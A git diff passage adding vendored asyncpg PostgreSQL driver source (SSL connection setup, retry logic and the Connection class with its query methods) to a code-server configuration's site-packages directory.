ssl_module.VERIFY_CRL_CHECK_CHAIN + else: + sslcrl = _dot_postgresql_path('root.crl') + if sslcrl is not None: + try: + ssl.load_verify_locations(cafile=sslcrl) + except ( + FileNotFoundError, + NotADirectoryError, + ): + pass + else: + ssl.verify_flags |= \ + ssl_module.VERIFY_CRL_CHECK_CHAIN + + if sslkey is None: + sslkey = os.getenv('PGSSLKEY') + if not sslkey: + sslkey = _dot_postgresql_path('postgresql.key') + if sslkey is not None and not sslkey.exists(): + sslkey = None + if not sslpassword: + sslpassword = '' + if sslcert is None: + sslcert = os.getenv('PGSSLCERT') + if sslcert: + ssl.load_cert_chain( + sslcert, keyfile=sslkey, password=lambda: sslpassword + ) + else: + sslcert = _dot_postgresql_path('postgresql.crt') + if sslcert is not None: + try: + ssl.load_cert_chain( + sslcert, + keyfile=sslkey, + password=lambda: sslpassword + ) + except (FileNotFoundError, NotADirectoryError): + pass + + # OpenSSL 1.1.1 keylog file, copied from create_default_context() + if hasattr(ssl, 'keylog_filename'): + keylogfile = os.environ.get('SSLKEYLOGFILE') + if keylogfile and not sys.flags.ignore_environment: + ssl.keylog_filename = keylogfile + + if ssl_min_protocol_version is None: + ssl_min_protocol_version = os.getenv('PGSSLMINPROTOCOLVERSION') + if ssl_min_protocol_version: + ssl.minimum_version = _parse_tls_version( + ssl_min_protocol_version + ) + else: + ssl.minimum_version = _parse_tls_version('TLSv1.2') + + if ssl_max_protocol_version is None: + ssl_max_protocol_version = os.getenv('PGSSLMAXPROTOCOLVERSION') + if ssl_max_protocol_version: + ssl.maximum_version = _parse_tls_version( + ssl_max_protocol_version + ) + + elif ssl is True: + ssl = ssl_module.create_default_context() + sslmode = SSLMode.verify_full + else: + sslmode = SSLMode.disable + + if server_settings is not None and ( + not isinstance(server_settings, dict) or + not all(isinstance(k, str) for k in server_settings) or + not all(isinstance(v, str) for v in server_settings.values())): + raise exceptions.ClientConfigurationError( + 'server_settings is expected to be None or ' + 'a Dict[str, str]') + + if target_session_attrs is None: + target_session_attrs = os.getenv( + "PGTARGETSESSIONATTRS", SessionAttribute.any + ) + try: + target_session_attrs = SessionAttribute(target_session_attrs) + except ValueError: + raise exceptions.ClientConfigurationError( + "target_session_attrs is expected to be one of " + "{!r}" + ", got {!r}".format( + SessionAttribute.__members__.values, target_session_attrs + ) + ) from None + + if krbsrvname is None: + krbsrvname = os.getenv('PGKRBSRVNAME') + + if gsslib is None: + gsslib = os.getenv('PGGSSLIB') + if gsslib is None: + gsslib = 'sspi' if _system == 'Windows' else 'gssapi' + if gsslib not in {'gssapi', 'sspi'}: + raise exceptions.ClientConfigurationError( + "gsslib parameter must be either 'gssapi' or 'sspi'" + ", got {!r}".format(gsslib)) + + params = _ConnectionParameters( + user=user, password=password, database=database, ssl=ssl, + sslmode=sslmode, ssl_negotiation=sslneg, + server_settings=server_settings, + target_session_attrs=target_session_attrs, + krbsrvname=krbsrvname, gsslib=gsslib) + + return addrs, params + + +def _parse_connect_arguments(*, dsn, host, port, user, password, passfile, + database, command_timeout, + statement_cache_size, + max_cached_statement_lifetime, + max_cacheable_statement_size, + ssl, direct_tls, server_settings, + target_session_attrs, krbsrvname, gsslib, + service, servicefile): + local_vars = locals() + for var_name in {'max_cacheable_statement_size', + 'max_cached_statement_lifetime', + 'statement_cache_size'}: + var_val = local_vars[var_name] + if var_val is None or isinstance(var_val, bool) or var_val < 0: + raise ValueError( + '{} is expected to be greater ' + 'or equal to 0, got {!r}'.format(var_name, var_val)) + + if command_timeout is not None: + try: + if isinstance(command_timeout, bool): + raise ValueError + command_timeout = float(command_timeout) + if command_timeout <= 0: + raise ValueError + except ValueError: + raise ValueError( + 'invalid command_timeout value: ' + 'expected greater than 0 float (got {!r})'.format( + command_timeout)) from None + + addrs, params = _parse_connect_dsn_and_args( + dsn=dsn, host=host, port=port, user=user, + password=password, passfile=passfile, ssl=ssl, + direct_tls=direct_tls, database=database, + server_settings=server_settings, + target_session_attrs=target_session_attrs, + krbsrvname=krbsrvname, gsslib=gsslib, + service=service, servicefile=servicefile) + + config = _ClientConfiguration( + command_timeout=command_timeout, + statement_cache_size=statement_cache_size, + max_cached_statement_lifetime=max_cached_statement_lifetime, + max_cacheable_statement_size=max_cacheable_statement_size,) + + return addrs, params, config + + +class TLSUpgradeProto(asyncio.Protocol): + def __init__( + self, + loop: asyncio.AbstractEventLoop, + host: str, + port: int, + ssl_context: ssl_module.SSLContext, + ssl_is_advisory: bool, + ) -> None: + self.on_data = _create_future(loop) + self.host = host + self.port = port + self.ssl_context = ssl_context + self.ssl_is_advisory = ssl_is_advisory + + def data_received(self, data: bytes) -> None: + if data == b'S': + self.on_data.set_result(True) + elif (self.ssl_is_advisory and + self.ssl_context.verify_mode == ssl_module.CERT_NONE and + data == b'N'): + # ssl_is_advisory will imply that ssl.verify_mode == CERT_NONE, + # since the only way to get ssl_is_advisory is from + # sslmode=prefer. But be extra sure to disallow insecure + # connections when the ssl context asks for real security. + self.on_data.set_result(False) + else: + self.on_data.set_exception( + ConnectionError( + 'PostgreSQL server at "{host}:{port}" ' + 'rejected SSL upgrade'.format( + host=self.host, port=self.port))) + + def connection_lost(self, exc: typing.Optional[Exception]) -> None: + if not self.on_data.done(): + if exc is None: + exc = ConnectionError('unexpected connection_lost() call') + self.on_data.set_exception(exc) + + +_ProctolFactoryR = typing.TypeVar( + "_ProctolFactoryR", bound=asyncio.protocols.Protocol +) + + +async def _create_ssl_connection( + # TODO: The return type is a specific combination of subclasses of + # asyncio.protocols.Protocol that we can't express. For now, having the + # return type be dependent on signature of the factory is an improvement + protocol_factory: Callable[[], _ProctolFactoryR], + host: str, + port: int, + *, + loop: asyncio.AbstractEventLoop, + ssl_context: ssl_module.SSLContext, + ssl_is_advisory: bool = False, +) -> typing.Tuple[asyncio.Transport, _ProctolFactoryR]: + + tr, pr = await loop.create_connection( + lambda: TLSUpgradeProto(loop, host, port, + ssl_context, ssl_is_advisory), + host, port) + + tr.write(struct.pack('!ll', 8, 80877103)) # SSLRequest message. + + try: + do_ssl_upgrade = await pr.on_data + except (Exception, asyncio.CancelledError): + tr.close() + raise + + if hasattr(loop, 'start_tls'): + if do_ssl_upgrade: + try: + new_tr = await loop.start_tls( + tr, pr, ssl_context, server_hostname=host) + assert new_tr is not None + except (Exception, asyncio.CancelledError): + tr.close() + raise + else: + new_tr = tr + + pg_proto = protocol_factory() + pg_proto.is_ssl = do_ssl_upgrade + pg_proto.connection_made(new_tr) + new_tr.set_protocol(pg_proto) + + return new_tr, pg_proto + else: + conn_factory = functools.partial( + loop.create_connection, protocol_factory) + + if do_ssl_upgrade: + conn_factory = functools.partial( + conn_factory, ssl=ssl_context, server_hostname=host) + + sock = _get_socket(tr) + sock = sock.dup() + _set_nodelay(sock) + tr.close() + + try: + new_tr, pg_proto = await conn_factory(sock=sock) + pg_proto.is_ssl = do_ssl_upgrade + return new_tr, pg_proto + except (Exception, asyncio.CancelledError): + sock.close() + raise + + +async def _connect_addr( + *, + addr, + loop, + params, + config, + connection_class, + record_class +): + assert loop is not None + + params_input = params + if callable(params.password): + password = params.password() + if inspect.isawaitable(password): + password = await password + + params = params._replace(password=password) + args = (addr, loop, config, connection_class, record_class, params_input) + + # prepare the params (which attempt has ssl) for the 2 attempts + if params.sslmode == SSLMode.allow: + params_retry = params + params = params._replace(ssl=None) + elif params.sslmode == SSLMode.prefer: + params_retry = params._replace(ssl=None) + else: + # skip retry if we don't have to + return await __connect_addr(params, False, *args) + + # first attempt + try: + return await __connect_addr(params, True, *args) + except _RetryConnectSignal: + pass + + # second attempt + return await __connect_addr(params_retry, False, *args) + + +class _RetryConnectSignal(Exception): + pass + + +async def __connect_addr( + params, + retry, + addr, + loop, + config, + connection_class, + record_class, + params_input, +): + connected = _create_future(loop) + + proto_factory = lambda: protocol.Protocol( + addr, connected, params, record_class, loop) + + if isinstance(addr, str): + # UNIX socket + connector = loop.create_unix_connection(proto_factory, addr) + + elif params.ssl and params.ssl_negotiation is SSLNegotiation.direct: + # if ssl and ssl_negotiation is `direct`, skip STARTTLS and perform + # direct SSL connection + connector = loop.create_connection( + proto_factory, *addr, ssl=params.ssl + ) + + elif params.ssl: + connector = _create_ssl_connection( + proto_factory, *addr, loop=loop, ssl_context=params.ssl, + ssl_is_advisory=params.sslmode == SSLMode.prefer) + else: + connector = loop.create_connection(proto_factory, *addr) + + tr, pr = await connector + + try: + await connected + except ( + exceptions.InvalidAuthorizationSpecificationError, + exceptions.ConnectionDoesNotExistError, # seen on Windows + ): + tr.close() + + # retry=True here is a redundant check because we don't want to + # accidentally raise the internal _RetryConnectSignal to the user + if retry and ( + params.sslmode == SSLMode.allow and not pr.is_ssl or + params.sslmode == SSLMode.prefer and pr.is_ssl + ): + # Trigger retry when: + # 1. First attempt with sslmode=allow, ssl=None failed + # 2. First attempt with sslmode=prefer, ssl=ctx failed while the + # server claimed to support SSL (returning "S" for SSLRequest) + # (likely because pg_hba.conf rejected the connection) + raise _RetryConnectSignal() + + else: + # but will NOT retry if: + # 1. First attempt with sslmode=prefer failed but the server + # doesn't support SSL (returning 'N' for SSLRequest), because + # we already tried to connect without SSL thru ssl_is_advisory + # 2. Second attempt with sslmode=prefer, ssl=None failed + # 3. Second attempt with sslmode=allow, ssl=ctx failed + # 4. Any other sslmode + raise + + except (Exception, asyncio.CancelledError): + tr.close() + raise + + con = connection_class(pr, tr, loop, addr, config, params_input) + pr.set_connection(con) + return con + + +class SessionAttribute(str, enum.Enum): + any = 'any' + primary = 'primary' + standby = 'standby' + prefer_standby = 'prefer-standby' + read_write = "read-write" + read_only = "read-only" + + +def _accept_in_hot_standby(should_be_in_hot_standby: bool): + """ + If the server didn't report "in_hot_standby" at startup, we must determine + the state by checking "SELECT pg_catalog.pg_is_in_recovery()". + If the server allows a connection and states it is in recovery it must + be a replica/standby server. + """ + async def can_be_used(connection): + settings = connection.get_settings() + hot_standby_status = getattr(settings, 'in_hot_standby', None) + if hot_standby_status is not None: + is_in_hot_standby = hot_standby_status == 'on' + else: + is_in_hot_standby = await connection.fetchval( + "SELECT pg_catalog.pg_is_in_recovery()" + ) + return is_in_hot_standby == should_be_in_hot_standby + + return can_be_used + + +def _accept_read_only(should_be_read_only: bool): + """ + Verify the server has not set default_transaction_read_only=True + """ + async def can_be_used(connection): + settings = connection.get_settings() + is_readonly = getattr(settings, 'default_transaction_read_only', 'off') + + if is_readonly == "on": + return should_be_read_only + + return await _accept_in_hot_standby(should_be_read_only)(connection) + return can_be_used + + +async def _accept_any(_): + return True + + +target_attrs_check = { + SessionAttribute.any: _accept_any, + SessionAttribute.primary: _accept_in_hot_standby(False), + SessionAttribute.standby: _accept_in_hot_standby(True), + SessionAttribute.prefer_standby: _accept_in_hot_standby(True), + SessionAttribute.read_write: _accept_read_only(False), + SessionAttribute.read_only: _accept_read_only(True), +} + + +async def _can_use_connection(connection, attr: SessionAttribute): + can_use = target_attrs_check[attr] + return await can_use(connection) + + +async def _connect(*, loop, connection_class, record_class, **kwargs): + if loop is None: + loop = asyncio.get_event_loop() + + addrs, params, config = _parse_connect_arguments(**kwargs) + target_attr = params.target_session_attrs + + candidates = [] + chosen_connection = None + last_error = None + try: + for addr in addrs: + try: + conn = await _connect_addr( + addr=addr, + loop=loop, + params=params, + config=config, + connection_class=connection_class, + record_class=record_class, + ) + candidates.append(conn) + if await _can_use_connection(conn, target_attr): + chosen_connection = conn + break + except OSError as ex: + last_error = ex + else: + if target_attr == SessionAttribute.prefer_standby and candidates: + chosen_connection = random.choice(candidates) + finally: + + async def _close_candidates(conns, chosen): + await asyncio.gather( + *(c.close() for c in conns if c is not chosen), + return_exceptions=True + ) + if candidates: + asyncio.create_task( + _close_candidates(candidates, chosen_connection)) + + if chosen_connection: + return chosen_connection + + raise last_error or exceptions.TargetServerAttributeNotMatched( + 'None of the hosts match the target attribute requirement ' + '{!r}'.format(target_attr) + ) + + +async def _cancel(*, loop, addr, params: _ConnectionParameters, + backend_pid, backend_secret): + + class CancelProto(asyncio.Protocol): + + def __init__(self): + self.on_disconnect = _create_future(loop) + self.is_ssl = False + + def connection_lost(self, exc): + if not self.on_disconnect.done(): + self.on_disconnect.set_result(True) + + if isinstance(addr, str): + tr, pr = await loop.create_unix_connection(CancelProto, addr) + else: + if params.ssl and params.sslmode != SSLMode.allow: + tr, pr = await _create_ssl_connection( + CancelProto, + *addr, + loop=loop, + ssl_context=params.ssl, + ssl_is_advisory=params.sslmode == SSLMode.prefer) + else: + tr, pr = await loop.create_connection( + CancelProto, *addr) + _set_nodelay(_get_socket(tr)) + + # Pack a CancelRequest message + msg = struct.pack('!llll', 16, 80877102, backend_pid, backend_secret) + + try: + tr.write(msg) + await pr.on_disconnect + finally: + tr.close() + + +def _get_socket(transport): + sock = transport.get_extra_info('socket') + if sock is None: + # Shouldn't happen with any asyncio-complaint event loop. + raise ConnectionError( + 'could not get the socket for transport {!r}'.format(transport)) + return sock + + +def _set_nodelay(sock): + if not hasattr(socket, 'AF_UNIX') or sock.family != socket.AF_UNIX: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + + +def _create_future(loop): + try: + create_future = loop.create_future + except AttributeError: + return asyncio.Future(loop=loop) + else: + return create_future() diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connection.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connection.py new file mode 100755 index 0000000..71fb04f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connection.py @@ -0,0 +1,2773 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import asyncio +import asyncpg +import collections +import collections.abc +import contextlib +import functools +import itertools +import inspect +import os +import sys +import time +import traceback +import typing +import warnings +import weakref + +from . import compat +from . import connect_utils +from . import cursor +from . import exceptions +from . import introspection +from . import prepared_stmt +from . import protocol +from . import serverversion +from . import transaction +from . import utils + + +class ConnectionMeta(type): + + def __instancecheck__(cls, instance): + mro = type(instance).__mro__ + return Connection in mro or _ConnectionProxy in mro + + +class Connection(metaclass=ConnectionMeta): + """A representation of a database session. + + Connections are created by calling :func:`~asyncpg.connection.connect`. + """ + + __slots__ = ('_protocol', '_transport', '_loop', + '_top_xact', '_aborted', + '_pool_release_ctr', '_stmt_cache', '_stmts_to_close', + '_stmt_cache_enabled', + '_listeners', '_server_version', '_server_caps', + '_intro_query', '_reset_query', '_proxy', + '_stmt_exclusive_section', '_config', '_params', '_addr', + '_log_listeners', '_termination_listeners', '_cancellations', + '_source_traceback', '_query_loggers', '__weakref__') + + def __init__(self, protocol, transport, loop, + addr, + config: connect_utils._ClientConfiguration, + params: connect_utils._ConnectionParameters): + self._protocol = protocol + self._transport = transport + self._loop = loop + self._top_xact = None + self._aborted = False + # Incremented every time the connection is released back to a pool. + # Used to catch invalid references to connection-related resources + # post-release (e.g. explicit prepared statements). + self._pool_release_ctr = 0 + + self._addr = addr + self._config = config + self._params = params + + self._stmt_cache = _StatementCache( + loop=loop, + max_size=config.statement_cache_size, + on_remove=functools.partial( + _weak_maybe_gc_stmt, weakref.ref(self)), + max_lifetime=config.max_cached_statement_lifetime) + + self._stmts_to_close = set() + self._stmt_cache_enabled = config.statement_cache_size > 0 + + self._listeners = {} + self._log_listeners = set() + self._cancellations = set() + self._termination_listeners = set() + self._query_loggers = set() + + settings = self._protocol.get_settings() + ver_string = settings.server_version + self._server_version = \ + serverversion.split_server_version_string(ver_string) + + self._server_caps = _detect_server_capabilities( + self._server_version, settings) + + if self._server_version < (14, 0): + self._intro_query = introspection.INTRO_LOOKUP_TYPES_13 + else: + self._intro_query = introspection.INTRO_LOOKUP_TYPES + + self._reset_query = None + self._proxy = None + + # Used to serialize operations that might involve anonymous + # statements. Specifically, we want to make the following + # operation atomic: + # ("prepare an anonymous statement", "use the statement") + # + # Used for `con.fetchval()`, `con.fetch()`, `con.fetchrow()`, + # `con.execute()`, and `con.executemany()`. + self._stmt_exclusive_section = _Atomic() + + if loop.get_debug(): + self._source_traceback = _extract_stack() + else: + self._source_traceback = None + + def __del__(self): + if not self.is_closed() and self._protocol is not None: + if self._source_traceback: + msg = "unclosed connection {!r}; created at:\n {}".format( + self, self._source_traceback) + else: + msg = ( + "unclosed connection {!r}; run in asyncio debug " + "mode to show the traceback of connection " + "origin".format(self) + ) + + warnings.warn(msg, ResourceWarning) + if not self._loop.is_closed(): + self.terminate() + + async def add_listener(self, channel, callback): + """Add a listener for Postgres notifications. + + :param str channel: Channel to listen on. + + :param callable callback: + A callable or a coroutine function receiving the following + arguments: + **connection**: a Connection the callback is registered with; + **pid**: PID of the Postgres server that sent the notification; + **channel**: name of the channel the notification was sent to; + **payload**: the payload. + + .. versionchanged:: 0.24.0 + The ``callback`` argument may be a coroutine function. + """ + self._check_open() + if channel not in self._listeners: + await self.fetch('LISTEN {}'.format(utils._quote_ident(channel))) + self._listeners[channel] = set() + self._listeners[channel].add(_Callback.from_callable(callback)) + + async def remove_listener(self, channel, callback): + """Remove a listening callback on the specified channel.""" + if self.is_closed(): + return + if channel not in self._listeners: + return + cb = _Callback.from_callable(callback) + if cb not in self._listeners[channel]: + return + self._listeners[channel].remove(cb) + if not self._listeners[channel]: + del self._listeners[channel] + await self.fetch('UNLISTEN {}'.format(utils._quote_ident(channel))) + + def add_log_listener(self, callback): + """Add a listener for Postgres log messages. + + It will be called when asyncronous NoticeResponse is received + from the connection. Possible message types are: WARNING, NOTICE, + DEBUG, INFO, or LOG. + + :param callable callback: + A callable or a coroutine function receiving the following + arguments: + **connection**: a Connection the callback is registered with; + **message**: the `exceptions.PostgresLogMessage` message. + + .. versionadded:: 0.12.0 + + .. versionchanged:: 0.24.0 + The ``callback`` argument may be a coroutine function. + """ + if self.is_closed(): + raise exceptions.InterfaceError('connection is closed') + self._log_listeners.add(_Callback.from_callable(callback)) + + def remove_log_listener(self, callback): + """Remove a listening callback for log messages. + + .. versionadded:: 0.12.0 + """ + self._log_listeners.discard(_Callback.from_callable(callback)) + + def add_termination_listener(self, callback): + """Add a listener that will be called when the connection is closed. + + :param callable callback: + A callable or a coroutine function receiving one argument: + **connection**: a Connection the callback is registered with. + + .. versionadded:: 0.21.0 + + .. versionchanged:: 0.24.0 + The ``callback`` argument may be a coroutine function. + """ + self._termination_listeners.add(_Callback.from_callable(callback)) + + def remove_termination_listener(self, callback): + """Remove a listening callback for connection termination. + + :param callable callback: + The callable or coroutine function that was passed to + :meth:`Connection.add_termination_listener`. + + .. versionadded:: 0.21.0 + """ + self._termination_listeners.discard(_Callback.from_callable(callback)) + + def add_query_logger(self, callback): + """Add a logger that will be called when queries are executed. + + :param callable callback: + A callable or a coroutine function receiving one argument: + **record**, a LoggedQuery containing `query`, `args`, `timeout`, + `elapsed`, `exception`, `conn_addr`, and `conn_params`. + + .. versionadded:: 0.29.0 + """ + self._query_loggers.add(_Callback.from_callable(callback)) + + def remove_query_logger(self, callback): + """Remove a query logger callback. + + :param callable callback: + The callable or coroutine function that was passed to + :meth:`Connection.add_query_logger`. + + .. versionadded:: 0.29.0 + """ + self._query_loggers.discard(_Callback.from_callable(callback)) + + def get_server_pid(self): + """Return the PID of the Postgres server the connection is bound to.""" + return self._protocol.get_server_pid() + + def get_server_version(self): + """Return the version of the connected PostgreSQL server. + + The returned value is a named tuple similar to that in + ``sys.version_info``: + + .. code-block:: pycon + + >>> con.get_server_version() + ServerVersion(major=9, minor=6, micro=1, + releaselevel='final', serial=0) + + .. versionadded:: 0.8.0 + """ + return self._server_version + + def get_settings(self): + """Return connection settings. + + :return: :class:`~asyncpg.ConnectionSettings`. + """ + return self._protocol.get_settings() + + def transaction(self, *, isolation=None, readonly=False, + deferrable=False): + """Create a :class:`~transaction.Transaction` object. + + Refer to `PostgreSQL documentation`_ on the meaning of transaction + parameters. + + :param isolation: Transaction isolation mode, can be one of: + `'serializable'`, `'repeatable_read'`, + `'read_uncommitted'`, `'read_committed'`. If not + specified, the behavior is up to the server and + session, which is usually ``read_committed``. + + :param readonly: Specifies whether or not this transaction is + read-only. + + :param deferrable: Specifies whether or not this transaction is + deferrable. + + .. _`PostgreSQL documentation`: + https://www.postgresql.org/docs/ + current/static/sql-set-transaction.html + """ + self._check_open() + return transaction.Transaction(self, isolation, readonly, deferrable) + + def is_in_transaction(self): + """Return True if Connection is currently inside a transaction. + + :return bool: True if inside transaction, False otherwise. + + .. versionadded:: 0.16.0 + """ + return self._protocol.is_in_transaction() + + async def execute( + self, + query: str, + *args, + timeout: typing.Optional[float]=None, + ) -> str: + """Execute an SQL command (or commands). + + This method can execute many SQL commands at once, when no arguments + are provided. + + Example: + + .. code-block:: pycon + + >>> await con.execute(''' + ... CREATE TABLE mytab (a int); + ... INSERT INTO mytab (a) VALUES (100), (200), (300); + ... ''') + INSERT 0 3 + + >>> await con.execute(''' + ... INSERT INTO mytab (a) VALUES ($1), ($2) + ... ''', 10, 20) + INSERT 0 2 + + :param args: Query arguments. + :param float timeout: Optional timeout value in seconds. + :return str: Status of the last SQL command. + + .. versionchanged:: 0.5.4 + Made it possible to pass query arguments. + """ + self._check_open() + + if not args: + if self._query_loggers: + with self._time_and_log(query, args, timeout): + result = await self._protocol.query(query, timeout) + else: + result = await self._protocol.query(query, timeout) + return result + + _, status, _ = await self._execute( + query, + args, + 0, + timeout, + return_status=True, + ) + return status.decode() + + async def executemany( + self, + command: str, + args, + *, + timeout: typing.Optional[float]=None, + ): + """Execute an SQL *command* for each sequence of arguments in *args*. + + Example: + + .. code-block:: pycon + + >>> await con.executemany(''' + ... INSERT INTO mytab (a) VALUES ($1, $2, $3); + ... ''', [(1, 2, 3), (4, 5, 6)]) + + :param command: Command to execute. + :param args: An iterable containing sequences of arguments. + :param float timeout: Optional timeout value in seconds. + :return None: This method discards the results of the operations. + + .. versionadded:: 0.7.0 + + .. versionchanged:: 0.11.0 + `timeout` became a keyword-only parameter. + + .. versionchanged:: 0.22.0 + ``executemany()`` is now an atomic operation, which means that + either all executions succeed, or none at all. This is in contrast + to prior versions, where the effect of already-processed iterations + would remain in place when an error has occurred, unless + ``executemany()`` was called in a transaction. + """ + self._check_open() + return await self._executemany(command, args, timeout) + + async def _get_statement( + self, + query, + timeout, + *, + named: typing.Union[str, bool, None] = False, + use_cache=True, + ignore_custom_codec=False, + record_class=None + ): + if record_class is None: + record_class = self._protocol.get_record_class() + else: + _check_record_class(record_class) + + if use_cache: + statement = self._stmt_cache.get( + (query, record_class, ignore_custom_codec) + ) + if statement is not None: + return statement + + # Only use the cache when: + # * `statement_cache_size` is greater than 0; + # * query size is less than `max_cacheable_statement_size`. + use_cache = ( + self._stmt_cache_enabled + and ( + not self._config.max_cacheable_statement_size + or len(query) <= self._config.max_cacheable_statement_size + ) + ) + + if isinstance(named, str): + stmt_name = named + elif use_cache or named: + stmt_name = self._get_unique_id('stmt') + else: + stmt_name = '' + + statement = await self._protocol.prepare( + stmt_name, + query, + timeout, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + need_reprepare = False + types_with_missing_codecs = statement._init_types() + tries = 0 + while types_with_missing_codecs: + settings = self._protocol.get_settings() + + # Introspect newly seen types and populate the + # codec cache. + types, intro_stmt = await self._introspect_types( + types_with_missing_codecs, timeout) + + settings.register_data_types(types) + + # The introspection query has used an anonymous statement, + # which has blown away the anonymous statement we've prepared + # for the query, so we need to re-prepare it. + need_reprepare = not intro_stmt.name and not statement.name + types_with_missing_codecs = statement._init_types() + tries += 1 + if tries > 5: + # In the vast majority of cases there will be only + # one iteration. In rare cases, there might be a race + # with reload_schema_state(), which would cause a + # second try. More than five is clearly a bug. + raise exceptions.InternalClientError( + 'could not resolve query result and/or argument types ' + 'in {} attempts'.format(tries) + ) + + # Now that types have been resolved, populate the codec pipeline + # for the statement. + statement._init_codecs() + + if ( + need_reprepare + or (not statement.name and not self._stmt_cache_enabled) + ): + # Mark this anonymous prepared statement as "unprepared", + # causing it to get re-Parsed in next bind_execute. + # We always do this when stmt_cache_size is set to 0 assuming + # people are running PgBouncer which is mishandling implicit + # transactions. + statement.mark_unprepared() + + if use_cache: + self._stmt_cache.put( + (query, record_class, ignore_custom_codec), statement) + + # If we've just created a new statement object, check if there + # are any statements for GC. + if self._stmts_to_close: + await self._cleanup_stmts() + + return statement + + async def _introspect_types(self, typeoids, timeout): + if self._server_caps.jit: + try: + cfgrow, _ = await self.__execute( + """ + SELECT + current_setting('jit') AS cur, + set_config('jit', 'off', false) AS new + """, + (), + 0, + timeout, + ignore_custom_codec=True, + ) + jit_state = cfgrow[0]['cur'] + except exceptions.UndefinedObjectError: + jit_state = 'off' + else: + jit_state = 'off' + + result = await self.__execute( + self._intro_query, + (list(typeoids),), + 0, + timeout, + ignore_custom_codec=True, + ) + + if jit_state != 'off': + await self.__execute( + """ + SELECT + set_config('jit', $1, false) + """, + (jit_state,), + 0, + timeout, + ignore_custom_codec=True, + ) + + return result + + async def _introspect_type(self, typename, schema): + if schema == 'pg_catalog' and not typename.endswith("[]"): + typeoid = protocol.BUILTIN_TYPE_NAME_MAP.get(typename.lower()) + if typeoid is not None: + return introspection.TypeRecord((typeoid, None, b"b")) + + rows = await self._execute( + introspection.TYPE_BY_NAME, + [typename, schema], + limit=1, + timeout=None, + ignore_custom_codec=True, + ) + + if not rows: + raise ValueError( + 'unknown type: {}.{}'.format(schema, typename)) + + return rows[0] + + def cursor( + self, + query, + *args, + prefetch=None, + timeout=None, + record_class=None + ): + """Return a *cursor factory* for the specified query. + + :param args: + Query arguments. + :param int prefetch: + The number of rows the *cursor iterator* + will prefetch (defaults to ``50``.) + :param float timeout: + Optional timeout in seconds. + :param type record_class: + If specified, the class to use for records returned by this cursor. + Must be a subclass of :class:`~asyncpg.Record`. If not specified, + a per-connection *record_class* is used. + + :return: + A :class:`~cursor.CursorFactory` object. + + .. versionchanged:: 0.22.0 + Added the *record_class* parameter. + """ + self._check_open() + return cursor.CursorFactory( + self, + query, + None, + args, + prefetch, + timeout, + record_class, + ) + + async def prepare( + self, + query, + *, + name=None, + timeout=None, + record_class=None, + ): + """Create a *prepared statement* for the specified query. + + :param str query: + Text of the query to create a prepared statement for. + :param str name: + Optional name of the returned prepared statement. If not + specified, the name is auto-generated. + :param float timeout: + Optional timeout value in seconds. + :param type record_class: + If specified, the class to use for records returned by the + prepared statement. Must be a subclass of + :class:`~asyncpg.Record`. If not specified, a per-connection + *record_class* is used. + + :return: + A :class:`~prepared_stmt.PreparedStatement` instance. + + .. versionchanged:: 0.22.0 + Added the *record_class* parameter. + + .. versionchanged:: 0.25.0 + Added the *name* parameter. + """ + return await self._prepare( + query, + name=name, + timeout=timeout, + record_class=record_class, + ) + + async def _prepare( + self, + query, + *, + name: typing.Union[str, bool, None] = None, + timeout=None, + use_cache: bool=False, + record_class=None + ): + self._check_open() + if name is None: + name = self._stmt_cache_enabled + stmt = await self._get_statement( + query, + timeout, + named=name, + use_cache=use_cache, + record_class=record_class, + ) + return prepared_stmt.PreparedStatement(self, query, stmt) + + async def fetch( + self, + query, + *args, + timeout=None, + record_class=None + ) -> list: + """Run a query and return the results as a list of :class:`Record`. + + :param str query: + Query text. + :param args: + Query arguments. + :param float timeout: + Optional timeout value in seconds. + :param type record_class: + If specified, the class to use for records returned by this method. + Must be a subclass of :class:`~asyncpg.Record`. If not specified, + a per-connection *record_class* is used. + + :return list: + A list of :class:`~asyncpg.Record` instances. If specified, the + actual type of list elements would be *record_class*. + + .. versionchanged:: 0.22.0 + Added the *record_class* parameter. + """ + self._check_open() + return await self._execute( + query, + args, + 0, + timeout, + record_class=record_class, + ) + + async def fetchval(self, query, *args, column=0, timeout=None): + """Run a query and return a value in the first row. + + :param str query: Query text. + :param args: Query arguments. + :param int column: Numeric index within the record of the value to + return (defaults to 0). + :param float timeout: Optional timeout value in seconds. + If not specified, defaults to the value of + ``command_timeout`` argument to the ``Connection`` + instance constructor. + + :return: The value of the specified column of the first record, or + None if no records were returned by the query. + """ + self._check_open() + data = await self._execute(query, args, 1, timeout) + if not data: + return None + return data[0][column] + + async def fetchrow( + self, + query, + *args, + timeout=None, + record_class=None + ): + """Run a query and return the first row. + + :param str query: + Query text + :param args: + Query arguments + :param float timeout: + Optional timeout value in seconds. + :param type record_class: + If specified, the class to use for the value returned by this + method. Must be a subclass of :class:`~asyncpg.Record`. + If not specified, a per-connection *record_class* is used. + + :return: + The first row as a :class:`~asyncpg.Record` instance, or None if + no records were returned by the query. If specified, + *record_class* is used as the type for the result value. + + .. versionchanged:: 0.22.0 + Added the *record_class* parameter. + """ + self._check_open() + data = await self._execute( + query, + args, + 1, + timeout, + record_class=record_class, + ) + if not data: + return None + return data[0] + + async def fetchmany( + self, + query, + args, + *, + timeout: typing.Optional[float]=None, + record_class=None, + ): + """Run a query for each sequence of arguments in *args* + and return the results as a list of :class:`Record`. + + :param query: + Query to execute. + :param args: + An iterable containing sequences of arguments for the query. + :param float timeout: + Optional timeout value in seconds. + :param type record_class: + If specified, the class to use for records returned by this method. + Must be a subclass of :class:`~asyncpg.Record`. If not specified, + a per-connection *record_class* is used. + + :return list: + A list of :class:`~asyncpg.Record` instances. If specified, the + actual type of list elements would be *record_class*. + + Example: + + .. code-block:: pycon + + >>> rows = await con.fetchmany(''' + ... INSERT INTO mytab (a, b) VALUES ($1, $2) RETURNING a; + ... ''', [('x', 1), ('y', 2), ('z', 3)]) + >>> rows + [, , ] + + .. versionadded:: 0.30.0 + """ + self._check_open() + return await self._executemany( + query, args, timeout, return_rows=True, record_class=record_class + ) + + async def copy_from_table(self, table_name, *, output, + columns=None, schema_name=None, timeout=None, + format=None, oids=None, delimiter=None, + null=None, header=None, quote=None, + 